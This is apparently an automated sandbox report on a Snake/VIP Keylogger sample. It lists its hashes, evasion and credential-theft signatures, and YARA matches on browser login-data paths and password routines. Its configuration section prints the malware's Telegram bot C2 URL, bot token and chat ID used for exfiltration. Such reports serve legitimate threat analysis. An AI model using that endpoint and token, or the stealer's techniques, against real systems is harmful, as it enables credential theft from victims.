Edit tour

Windows Analysis Report
x8M2g1Xxhz.exe

Overview

General Information

Sample name:	x8M2g1Xxhz.exe renamed because original name is a hash value
Original sample name:	8d5ad043ae91a80f57574f52b78402a7497b7377a29ebd2401c1f42ef0c41617.exe
Analysis ID:	1588991
MD5:	6776d32ed5b26c788e25c1632b555d47
SHA1:	ca579bfb0a3a85fd0c234385d1fc5873a19d11a4
SHA256:	8d5ad043ae91a80f57574f52b78402a7497b7377a29ebd2401c1f42ef0c41617
Tags:	exeRedLineStealeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Detected potential crypto function

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

x8M2g1Xxhz.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\x8M2g1Xxhz.exe" MD5: 6776D32ED5B26C788E25C1632B555D47)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE", "Chat id": "5830304904"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE", "Chat_id": "5830304904", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.3798081243.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36383:$a1: get_encryptedPassword 0x36357:$a2: get_encryptedUsername 0x3641b:$a3: get_timePasswordChanged 0x36333:$a4: get_passwordField 0x36399:$a5: set_encryptedPassword 0x36166:$a7: get_logins 0x31a14:$a10: KeyLoggerEventArgs 0x319e3:$a11: KeyLoggerEventArgsEventHandler 0x3623a:$a13: _encryptedPassword
00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4011b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f7be:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fa1b:$a4: \Orbitum\User Data\Default\Login Data 0x403fa:$a5: \Kometa\User Data\Default\Login Data
00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33f84:$s1: UnHook 0x33f20:$s2: SetHook 0x33f59:$s3: CallNextHook 0x33ee8:$s4: _hook
00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x77121:$a1: get_encryptedPassword 0x770f5:$a2: get_encryptedUsername 0x771b9:$a3: get_timePasswordChanged 0x770d1:$a4: get_passwordField 0x77137:$a5: set_encryptedPassword 0x76f04:$a7: get_logins 0x727b2:$a10: KeyLoggerEventArgs 0x72781:$a11: KeyLoggerEventArgsEventHandler 0x76fd8:$a13: _encryptedPassword
00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35f13:$a1: get_encryptedPassword 0x35ee7:$a2: get_encryptedUsername 0x35fab:$a3: get_timePasswordChanged 0x35ec3:$a4: get_passwordField 0x35f29:$a5: set_encryptedPassword 0x35cf6:$a7: get_logins 0x315a4:$a10: KeyLoggerEventArgs 0x31573:$a11: KeyLoggerEventArgsEventHandler 0x35dca:$a13: _encryptedPassword
00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35463:$a1: get_encryptedPassword 0x35437:$a2: get_encryptedUsername 0x354fb:$a3: get_timePasswordChanged 0x35413:$a4: get_passwordField 0x35479:$a5: set_encryptedPassword 0x35246:$a7: get_logins 0x30af4:$a10: KeyLoggerEventArgs 0x30ac3:$a11: KeyLoggerEventArgsEventHandler 0x3531a:$a13: _encryptedPassword
00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f1fb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e89e:$a3: \Google\Chrome\User Data\Default\Login Data 0x3eafb:$a4: \Orbitum\User Data\Default\Login Data 0x3f4da:$a5: \Kometa\User Data\Default\Login Data
00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33064:$s1: UnHook 0x33000:$s2: SetHook 0x33039:$s3: CallNextHook 0x32fc8:$s4: _hook
Process Memory Space: x8M2g1Xxhz.exe PID: 7664	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: x8M2g1Xxhz.exe PID: 7664	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: x8M2g1Xxhz.exe PID: 7664	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: x8M2g1Xxhz.exe PID: 7664	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3efd5:$a1: get_encryptedPassword 0x7592f:$a1: get_encryptedPassword 0xdfa59:$a1: get_encryptedPassword 0x3409a1:$a1: get_encryptedPassword 0x3efa9:$a2: get_encryptedUsername 0x75903:$a2: get_encryptedUsername 0xdfa2d:$a2: get_encryptedUsername 0x340975:$a2: get_encryptedUsername 0x3f06d:$a3: get_timePasswordChanged 0x759c7:$a3: get_timePasswordChanged 0xdfaf1:$a3: get_timePasswordChanged 0x340a39:$a3: get_timePasswordChanged 0x3ef85:$a4: get_passwordField 0x758df:$a4: get_passwordField 0xdfa09:$a4: get_passwordField 0x340951:$a4: get_passwordField 0x3efeb:$a5: set_encryptedPassword 0x75945:$a5: set_encryptedPassword 0xdfa6f:$a5: set_encryptedPassword 0x3409b7:$a5: set_encryptedPassword 0x3edc1:$a7: get_logins
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.x8M2g1Xxhz.exe.7440000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.x8M2g1Xxhz.exe.7440000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.x8M2g1Xxhz.exe.7440000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.x8M2g1Xxhz.exe.7440000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33863:$a1: get_encryptedPassword 0x33837:$a2: get_encryptedUsername 0x338fb:$a3: get_timePasswordChanged 0x33813:$a4: get_passwordField 0x33879:$a5: set_encryptedPassword 0x33646:$a7: get_logins 0x2eef4:$a10: KeyLoggerEventArgs 0x2eec3:$a11: KeyLoggerEventArgsEventHandler 0x3371a:$a13: _encryptedPassword
0.2.x8M2g1Xxhz.exe.7440000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d5fb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cc9e:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cefb:$a4: \Orbitum\User Data\Default\Login Data 0x3d8da:$a5: \Kometa\User Data\Default\Login Data
0.2.x8M2g1Xxhz.exe.7440000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31464:$s1: UnHook 0x31400:$s2: SetHook 0x31439:$s3: CallNextHook 0x313c8:$s4: _hook
0.2.x8M2g1Xxhz.exe.49f0000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.x8M2g1Xxhz.exe.49f0000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.x8M2g1Xxhz.exe.49f0000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.x8M2g1Xxhz.exe.49f0000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34583:$a1: get_encryptedPassword 0x34557:$a2: get_encryptedUsername 0x3461b:$a3: get_timePasswordChanged 0x34533:$a4: get_passwordField 0x34599:$a5: set_encryptedPassword 0x34366:$a7: get_logins 0x2fc14:$a10: KeyLoggerEventArgs 0x2fbe3:$a11: KeyLoggerEventArgsEventHandler 0x3443a:$a13: _encryptedPassword
0.2.x8M2g1Xxhz.exe.49f0000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e31b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d9be:$a3: \Google\Chrome\User Data\Default\Login Data 0x3dc1b:$a4: \Orbitum\User Data\Default\Login Data 0x3e5fa:$a5: \Kometa\User Data\Default\Login Data
0.2.x8M2g1Xxhz.exe.49f0000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32184:$s1: UnHook 0x32120:$s2: SetHook 0x32159:$s3: CallNextHook 0x320e8:$s4: _hook
0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.3.x8M2g1Xxhz.exe.91dab0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36383:$a1: get_encryptedPassword 0x36357:$a2: get_encryptedUsername 0x3641b:$a3: get_timePasswordChanged 0x36333:$a4: get_passwordField 0x36399:$a5: set_encryptedPassword 0x36166:$a7: get_logins 0x31a14:$a10: KeyLoggerEventArgs 0x319e3:$a11: KeyLoggerEventArgsEventHandler 0x3623a:$a13: _encryptedPassword
0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4011b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f7be:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fa1b:$a4: \Orbitum\User Data\Default\Login Data 0x403fa:$a5: \Kometa\User Data\Default\Login Data
0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33f84:$s1: UnHook 0x33f20:$s2: SetHook 0x33f59:$s3: CallNextHook 0x33ee8:$s4: _hook
0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35463:$a1: get_encryptedPassword 0x35437:$a2: get_encryptedUsername 0x354fb:$a3: get_timePasswordChanged 0x35413:$a4: get_passwordField 0x35479:$a5: set_encryptedPassword 0x35246:$a7: get_logins 0x30af4:$a10: KeyLoggerEventArgs 0x30ac3:$a11: KeyLoggerEventArgsEventHandler 0x3531a:$a13: _encryptedPassword
0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f1fb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e89e:$a3: \Google\Chrome\User Data\Default\Login Data 0x3eafb:$a4: \Orbitum\User Data\Default\Login Data 0x3f4da:$a5: \Kometa\User Data\Default\Login Data
0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35463:$a1: get_encryptedPassword 0x35437:$a2: get_encryptedUsername 0x354fb:$a3: get_timePasswordChanged 0x35413:$a4: get_passwordField 0x35479:$a5: set_encryptedPassword 0x35246:$a7: get_logins 0x30af4:$a10: KeyLoggerEventArgs 0x30ac3:$a11: KeyLoggerEventArgsEventHandler 0x3531a:$a13: _encryptedPassword
0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33863:$a1: get_encryptedPassword 0x33837:$a2: get_encryptedUsername 0x338fb:$a3: get_timePasswordChanged 0x33813:$a4: get_passwordField 0x33879:$a5: set_encryptedPassword 0x33646:$a7: get_logins 0x2eef4:$a10: KeyLoggerEventArgs 0x2eec3:$a11: KeyLoggerEventArgsEventHandler 0x3371a:$a13: _encryptedPassword
0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35463:$a1: get_encryptedPassword 0x35437:$a2: get_encryptedUsername 0x354fb:$a3: get_timePasswordChanged 0x35413:$a4: get_passwordField 0x35479:$a5: set_encryptedPassword 0x35246:$a7: get_logins 0x30af4:$a10: KeyLoggerEventArgs 0x30ac3:$a11: KeyLoggerEventArgsEventHandler 0x3531a:$a13: _encryptedPassword
0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f1fb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e89e:$a3: \Google\Chrome\User Data\Default\Login Data 0x3eafb:$a4: \Orbitum\User Data\Default\Login Data 0x3f4da:$a5: \Kometa\User Data\Default\Login Data
0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34583:$a1: get_encryptedPassword 0x34557:$a2: get_encryptedUsername 0x3461b:$a3: get_timePasswordChanged 0x34533:$a4: get_passwordField 0x34599:$a5: set_encryptedPassword 0x34366:$a7: get_logins 0x2fc14:$a10: KeyLoggerEventArgs 0x2fbe3:$a11: KeyLoggerEventArgsEventHandler 0x3443a:$a13: _encryptedPassword
0.3.x8M2g1Xxhz.exe.91dab0.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.3.x8M2g1Xxhz.exe.91dab0.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d5fb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cc9e:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cefb:$a4: \Orbitum\User Data\Default\Login Data 0x3d8da:$a5: \Kometa\User Data\Default\Login Data
0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f1fb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e89e:$a3: \Google\Chrome\User Data\Default\Login Data 0x3eafb:$a4: \Orbitum\User Data\Default\Login Data 0x3f4da:$a5: \Kometa\User Data\Default\Login Data
0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33064:$s1: UnHook 0x33000:$s2: SetHook 0x33039:$s3: CallNextHook 0x32fc8:$s4: _hook
0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36383:$a1: get_encryptedPassword 0x36357:$a2: get_encryptedUsername 0x3641b:$a3: get_timePasswordChanged 0x36333:$a4: get_passwordField 0x36399:$a5: set_encryptedPassword 0x36166:$a7: get_logins 0x31a14:$a10: KeyLoggerEventArgs 0x319e3:$a11: KeyLoggerEventArgsEventHandler 0x3623a:$a13: _encryptedPassword
0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4011b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f7be:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fa1b:$a4: \Orbitum\User Data\Default\Login Data 0x403fa:$a5: \Kometa\User Data\Default\Login Data
0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33f84:$s1: UnHook 0x33f20:$s2: SetHook 0x33f59:$s3: CallNextHook 0x33ee8:$s4: _hook
0.3.x8M2g1Xxhz.exe.91dab0.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33863:$a1: get_encryptedPassword 0x33837:$a2: get_encryptedUsername 0x338fb:$a3: get_timePasswordChanged 0x33813:$a4: get_passwordField 0x33879:$a5: set_encryptedPassword 0x33646:$a7: get_logins 0x2eef4:$a10: KeyLoggerEventArgs 0x2eec3:$a11: KeyLoggerEventArgsEventHandler 0x3371a:$a13: _encryptedPassword
0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31464:$s1: UnHook 0x31400:$s2: SetHook 0x31439:$s3: CallNextHook 0x313c8:$s4: _hook
0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33064:$s1: UnHook 0x33000:$s2: SetHook 0x33039:$s3: CallNextHook 0x32fc8:$s4: _hook
0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33863:$a1: get_encryptedPassword 0x33837:$a2: get_encryptedUsername 0x338fb:$a3: get_timePasswordChanged 0x33813:$a4: get_passwordField 0x33879:$a5: set_encryptedPassword 0x33646:$a7: get_logins 0x2eef4:$a10: KeyLoggerEventArgs 0x2eec3:$a11: KeyLoggerEventArgsEventHandler 0x3371a:$a13: _encryptedPassword
0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33064:$s1: UnHook 0x33000:$s2: SetHook 0x33039:$s3: CallNextHook 0x32fc8:$s4: _hook
0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d5fb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cc9e:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cefb:$a4: \Orbitum\User Data\Default\Login Data 0x3d8da:$a5: \Kometa\User Data\Default\Login Data
0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35463:$a1: get_encryptedPassword 0x35437:$a2: get_encryptedUsername 0x354fb:$a3: get_timePasswordChanged 0x35413:$a4: get_passwordField 0x35479:$a5: set_encryptedPassword 0x35246:$a7: get_logins 0x30af4:$a10: KeyLoggerEventArgs 0x30ac3:$a11: KeyLoggerEventArgsEventHandler 0x3531a:$a13: _encryptedPassword
0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f1fb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e89e:$a3: \Google\Chrome\User Data\Default\Login Data 0x3eafb:$a4: \Orbitum\User Data\Default\Login Data 0x3f4da:$a5: \Kometa\User Data\Default\Login Data
0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33064:$s1: UnHook 0x33000:$s2: SetHook 0x33039:$s3: CallNextHook 0x32fc8:$s4: _hook
